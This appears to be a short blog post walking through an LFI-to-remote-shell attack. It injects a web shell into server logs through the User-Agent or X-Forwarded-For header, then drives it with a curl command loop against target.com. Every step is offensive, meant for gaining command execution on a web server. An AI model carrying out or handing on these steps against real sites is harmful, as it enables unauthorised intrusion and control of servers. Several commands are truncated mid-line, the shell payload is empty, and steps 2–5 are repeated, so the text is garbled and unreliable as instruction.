1. Find the LFI vulnerability in website
2. Inject web shell into log file with useragent or x-forwarded-for header or something that logger will log it.
# curl -s -A '' 'http://target.com/' -o /dev/null
3. When you can inject web shell, try use the shell with any command such as id, pwd, ls
# curl -s 'http://target.com/include.php?page=../../../../
4. Now you're ready to get the remote shell is similar that you are directly interactive in target.com's shell.(Run this in our shell)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/
5. Now you will browse to "http://target.com/
2. Inject web shell into log file with useragent or x-forwarded-for header or something that logger will log it.
# curl -s -A '' 'http://target.com/' -o /dev/null
3. When you can inject web shell, try use the shell with any command such as id, pwd, ls
# curl -s 'http://target.com/include.php?page=../../../../
4. Now you're ready to get the remote shell is similar that you are directly interactive in target.com's shell.(Run this in our shell)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/
5. Now you will browse to "http://target.com/
No comments:
Post a Comment